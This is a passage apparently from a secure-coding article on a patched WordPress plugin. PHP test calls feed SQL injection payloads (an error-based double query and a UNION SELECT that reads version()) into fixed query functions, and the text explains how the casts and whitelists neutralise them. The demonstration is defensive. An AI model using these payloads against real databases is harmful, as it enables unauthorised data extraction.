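echo cr_rating_query($db, '9 or (1,1)=(select count(0),concat(version(),floor(rand(0)*2))'
    . 'from(select 1 union select 2 union select 3)x group by 2'), "\n";
echo pm_list_query($db, array(
    'qtype' => '1 and 0 union select version(),2,3,4,5,6,7,8,9-- ',
    'query' => '1',
)), "\n";
// A legitimate request, to show the LIKE escaping and the whitelisted sort.
echo pm_list_query($db, array(
    'qtype' => 'name', 'query' => '50%_off', 'sortname' => 'status',
    'sortorder' => 'DESC', 'page' => '2', 'rp' => '5',
)), "\n";
```

In the first two calls the injected text simply vanishes: the `(int)` cast keeps `9` and drops the rest, and an unknown `qtype` disables the `WHERE` clause instead of being spliced into it. The third call shows the positive case: `%` and `_` typed by the user arrive in SQL escaped, and the sort column and direction are whatever the whitelist allowed, not what the client typed.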
Tags: auth bypass, wordpress vulnerabilities (RU), wordpress, wordpress plugin vuln, wordpress vulnerabilities